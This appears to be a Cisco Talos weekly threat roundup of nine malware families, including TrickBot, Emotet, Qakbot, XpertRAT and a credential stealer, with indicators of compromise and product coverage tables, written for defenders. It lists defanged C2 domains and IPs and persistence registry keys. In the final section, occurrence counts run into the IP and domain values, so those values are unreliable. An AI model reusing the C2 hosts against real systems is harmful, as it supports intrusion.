Channel: Cisco Talos Blog

Threat Roundup for January 17 to January 24

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Packed.TrickBot-7541396-1 | Packed | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.Qakbot-7541405-1 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Packed.Nymaim-7542552-1 | Packed | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate candidate command and control (C2) domains, from which it retrieves additional payloads.
Win.Malware.Azorult-7541464-1 | Malware | Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime.
Doc.Malware.Emotet-7544675-1 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Worm.Vobfus-7541859-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Win.Trojan.XpertRAT-7550253-1 | Trojan | XpertRAT is a remote access trojan that gives an attacker remote access to an infected machine and can steal sensitive information like usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi.
Win.Trojan.Upatre-7549404-0 | Trojan | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
Win.Packed.Passwordstealera-7544289-0 | Packed | This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed.

Threat Breakdown

Win.Packed.TrickBot-7541396-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: RefCount
2
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
1
Mutexes | Occurrences
Global\316D1C7871E1040
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
Files and or directories created | Occurrences
%System32%\Tasks\Task Gpu health | 40
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt | 40
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp | 40
None | 39
%APPDATA%\DirectTools\data | 25
%APPDATA%\DirectTools\settings.ini | 25
%APPDATA%\gpuhealth | 15
%APPDATA%\gpuhealth\data | 15
%APPDATA%\gpuhealth\settings.ini | 15
%APPDATA%\DirectTools\Data\pwgrab64 | 2
%APPDATA%\DirectTools\data\pwgrab64_configs\dpost | 2
%APPDATA%\DirectTools\data\pwgrab64_configs | 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection

ThreatGrid




Win.Dropper.Qakbot-7541405-1

Indicators of Compromise

Mutexes | Occurrences
ocmwn22
Files and or directories created | Occurrences
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt | 22
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp | 22
\TEMP\437d5b4d9e4c5d8ab4615871f9e7830c.exe | 1
\TEMP\385ece7d547122fba5d712c7495a6721.exe | 1
\TEMP\c09a343a545e0f9e36444a847e3ad5ac.exe | 1
\TEMP\c78811efdd2612e5ca25249df2cf7600.exe | 1

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

ThreatGrid




Win.Packed.Nymaim-7542552-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 15
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
15
Mutexes | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Files and or directories created | Occurrences
%ProgramData%\ph | 15
%ProgramData%\ph\fktiipx.ftf | 15
%TEMP%\gocf.ksv | 15
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> | 15
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> | 15
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> | 15
%TEMP%\fro.dfx | 12
\Documents and Settings\All Users\pxs\pil.ohu | 12
%TEMP%\bpnb.skg | 1
%TEMP%\haqhxh.vsz | 1
\Documents and Settings\All Users\po\vikog.axh | 1

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

ThreatGrid




Win.Malware.Azorult-7541464-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\PICTURE 20
<HKCU>\SOFTWARE\PICTURE\PICTUREPROCESSINGTOOLSV1.0 20
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: GlobalAssocChangedCounter
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1 10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: DisplayName
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: DisplayVersion
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: VersionMajor
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: VersionMinor
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: Publisher
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: DisplayIcon
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: UninstallString
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: URLInfoAbout
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: HelpLink
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: InstallLocation
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: InstallSource
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: Language
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: NoModify
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: NoRepair
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: InstallDate
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\WOTSUPER 2.1
Value Name: EstimatedSize
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE
Value Name: Type
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE
Value Name: Start
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE
Value Name: ErrorControl
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BYTEDOWNLOAD PROTECT SERVICE
Value Name: DisplayName
9
Mutexes | Occurrences
d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963} | 10
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A | 10
Global\<random guid> | 10
01B1CA98-EE2E-41B3-8A2F-F319643109E5 | 2
None | 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
Files and or directories created | Occurrences
\TEMP\d | 20
\TEMP\d-shm | 20
\TEMP\d-wal | 20
%TEMP%\~atmp | 11
%ProgramData% | 10
%TEMP%\$inst | 10
%TEMP%\$inst\2.tmp | 10
%TEMP%\$inst\temp_0.tmp | 10
\TEMP\config.ini | 10
%ProgramFiles(x86)%\wotsuper | 10
%ProgramFiles(x86)%\wotsuper\wotsuper | 10
%ProgramFiles(x86)%\wotsuper\wotsuper\Uninstall.exe | 10
%ProgramFiles(x86)%\wotsuper\wotsuper\Uninstall.ini | 10
%ProgramFiles(x86)%\wotsuper\wotsuper\wotsuper.exe | 10
%ProgramFiles(x86)%\wotsuper\wotsuper\wotsuper1.exe | 10
%SystemRoot%\wotsuper.reg | 10
%ProgramData%\freebl3.dll | 9
%ProgramData%\mozglue.dll | 9
%SystemRoot%\SysWOW64\config.ini | 9
%APPDATA%\Mozilla\Firefox\Profiles\1LCUQ8~1.DEF\cookies.sqlite-shm | 9
%APPDATA%\Mozilla\Firefox\Profiles\1LCUQ8~1.DEF\cookies.sqlite-wal | 9
%ProgramData%\msvcp140.dll | 8
%ProgramData%\nss3.dll | 6
%HOMEPATH%\pwordkrn.exe | 6
%ProgramData%\softokn3.dll | 5
*See JSON for more IOCs

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

ThreatGrid




Doc.Malware.Emotet-7544675-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA 7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: Type
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: Start
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ErrorControl
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ImagePath
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: DisplayName
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: WOW64
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUNCSITKA
Value Name: ObjectName
7
Mutexes | Occurrences
Global\I98B68E3C7
Global\M98B68E3C7
Global\Nx534F51BC1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Files and or directories created | Occurrences
%HOMEPATH%\229.exe | 10

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Worm.Vobfus-7541859-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WindowsDefender
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WindowsDefender
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WindowsDefender
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WindowsDefender
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: update
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: update
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: update
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: update
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BWOJ39VGEPRBJ
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BWOJ39VGEPRBJ
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: BWOJ39VGEPRBJ
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: BWOJ39VGEPRBJ
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IOAUWN4A3W4AA
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: IOAUWN4A3W4AA
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: IOAUWN4A3W4AA
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: IOAUWN4A3W4AA
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8L9ROXIFMECH6
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8L9ROXIFMECH6
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 8L9ROXIFMECH6
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 8L9ROXIFMECH6
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HE8MRP3X92SVO
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HE8MRP3X92SVO
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: HE8MRP3X92SVO
1
Mutexes | Occurrences
<random, matching [a-zA-Z0-9]{5,9}> | 7
HCQZLMB9VOLD | 1
1HZYRMUIRQ | 1
REYUIW9NA8LY | 1
bv1lr78956835 | 1
MUA192KRR0N | 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
Files and or directories created | Occurrences
%TEMP%\windefender.exe.jpg | 6
%TEMP%\update.exe.jpg | 1
%TEMP%\8c5gucto.exe.jpg | 1
%TEMP%\f5qrnr2jfk.exe.jpg | 1
%TEMP%\52qof1hoy2.exe.jpg | 1
%TEMP%\dvpiit26.exe.jpg | 1
%TEMP%\windefender.jpg | 1

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

ThreatGrid




Win.Trojan.XpertRAT-7550253-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UACDisableNotify
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X 13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X\RUN 13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X\RUN
Value Name: NOME
13
Mutexes | Occurrences
P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 | 13
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
joeing[.]dnsfor[.]me | 13
Files and or directories created | Occurrences
%TEMP%\Administrator.bmp | 13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 | 13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 | 13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe | 13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\ut | 13
%TEMP%\Westminster8.exe | 13

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Trojan.Upatre-7549404-0

Indicators of Compromise

Registry Keys | Occurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: a2fc9eb
8
Mutexes | Occurrences
qazwsxedc9
Local\MSCTF.Asm.Mutexsssssssssssss18
Local\MSCTF.CtfMonitorInstMutexsssssssssssss18
Global\b54c4621-3b1b-11ea-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
*See JSON for more IOCs
Files and or directories created | Occurrences
%HOMEPATH%\Start Menu\Programs\Startupx\system.pif | 8
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startupx\system.pif | 8
%APPDATA%\a2fc9eb | 8
%APPDATA%\a2fc9eb\ea2fc9.exe | 8
%APPDATA%\8ddb21f\88ddb2.exe | 5
%HOMEPATH%\HELP_FILE_430D48DC3.png | 1
%HOMEPATH%\HELP_FILE_530D48DC3.html | 1
%HOMEPATH%\HELP_FILE_530D48DC3.png | 1
%HOMEPATH%\HELP_FILE_630D48DC3.html | 1
%HOMEPATH%\HELP_FILE_630D48DC3.png | 1
%HOMEPATH%\HELP_FILE_730D48DC3.html | 1
%HOMEPATH%\HELP_FILE_730D48DC3.png | 1
%HOMEPATH%\HELP_FILE_830D48DC3.html | 1
%HOMEPATH%\HELP_FILE_830D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_130D48DC3.html | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_130D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_230D48DC3.html | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_230D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_330D48DC3.html | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_330D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_430D48DC3.html | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_430D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_530D48DC3.html | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_530D48DC3.png | 1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_630D48DC3.html | 1
*See JSON for more IOCs

File Hashes


Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella


Win.Packed.Passwordstealera-7544289-0

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Quasar Client Startup
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: java
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Java
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: error pending
2
<HKCR>\LOCAL SETTINGS\MUICACHE\\52C64B7E
Value Name: LanguageList
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows startup
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: NET framework
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: steam
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\\WINDOWS
Value Name: Id
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\\WINDOWS
Value Name: Index
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: NvDisplay
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
1
Mutexes | Occurrences
SwHHcMzPFPnmaghyKW2
ymJAxrWzIz9Lmt1RL32
UuCyPSySUiFSDdHPtO2
sFWQsTLv8c5vk4jyO01
tsgtBnaQMyDFZrUQIp1
YsyBq3MBwCzQNk2qhM1
q624fQPLA3sreuCLzt1
N3og1f8lHLVNu6W30c1
KckvHhqL1uihc4dCLw1
RTzXcJcD26j9cGndLe1
9uxtMjacj46ojfxw8Z1
tmiYIVMkI1dD9zfRjT1
hI0uR11aF8XGlij0wp1
fJO2dbxEGn2ZNnVHEj1
zqUBYqdAinRE5xYguS1
RtX4BZD2nWkVu0prSe1
HjjzZQZESOkAInyZch1
cP20H0tkmTiytEkIEL1
ixlUgkBMIocn8A96xU1
yIKLaGMppBM6EDhhvU1
mLvIMV7J1hOyksFGvj1
hj0AV9bM5BIleznxOc1
UQjK2wv6weKFSvAPxM1
UrlxbiSJX7lUOpSRZs1
JsMa39ctmfwcdenPhN1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
208[.]95[.]112[.]152
37[.]8[.]73[.]902
192[.]69[.]169[.]251
103[.]43[.]75[.]1051
3[.]14[.]212[.]1731
3[.]19[.]114[.]1851
18[.]188[.]14[.]651
103[.]136[.]43[.]1311
103[.]73[.]67[.]701
74[.]118[.]139[.]671
213[.]183[.]58[.]521
141[.]255[.]158[.]231
80[.]66[.]255[.]1291
95[.]59[.]113[.]1131
109[.]230[.]215[.]1811
185[.]248[.]100[.]841
95[.]156[.]232[.]341
88[.]150[.]227[.]1121
23[.]249[.]161[.]1111
36[.]84[.]57[.]2301
36[.]84[.]56[.]391
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
ip-api[.]com52
swez111[.]ddns[.]net5
scammer[.]chickenkiller[.]com2
holaholahola[.]hopto[.]org2
chrome[.]giize[.]com2
niroshimax[.]zapto[.]org2
0[.]tcp[.]ngrok[.]io1
gingles[.]ddns[.]net1
dhayan[.]ddns[.]net1
sanchosec[.]ddns[.]net1
apina123[.]duckdns[.]org1
mlks[.]ddns[.]net1
update1337[.]duckdns[.]org1
ord1
dike[.]duckdns[.]org1
nirovitch[.]zapto[.]org1
nume123[.]hopto[.]org1
pilnaspuodas[.]ddns[.]net1
danek56[.]ddns[.]net1
windows13467[.]ddns[.]net1
backtofuture[.]zapto[.]org1
nerdicon[.]ddns[.]net1
Files and/or directories created | Occurrences
%APPDATA%\Logs35
%APPDATA%\Logs\01-17-202035
%APPDATA%\SubDir28
%System32%\Tasks\WINDOWSSYSTEMHOST22
%APPDATA%\SubDir\Client.exe18
%System32%\Tasks\Quasar Client Startup8
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe8
E:\autorun.inf7
\autorun.inf7
%System32%\Tasks\java4
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>4
%APPDATA%\SubDir\WinUpdate.exe2
%SystemRoot%\SysWOW64\java642
%SystemRoot%\SysWOW64\java64\java.exe2
%System32%\Tasks\error pending 2
%APPDATA%\SubDir\fileintl.exe2
%System32%\Tasks\Windows Defender1
%System32%\Tasks\Windows1
%System32%\Tasks\Windows startup1
%System32%\Tasks\WinSql1
%APPDATA%\SubDir\WinSql1.exe1
%System32%\Tasks\NET framework1
%ProgramFiles(x86)%\SubDir1
%ProgramFiles(x86)%\SubDir\Client.exe1
%System32%\Tasks\RDPBlox Agent1
*See JSON for more IOCs

File Hashes

02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 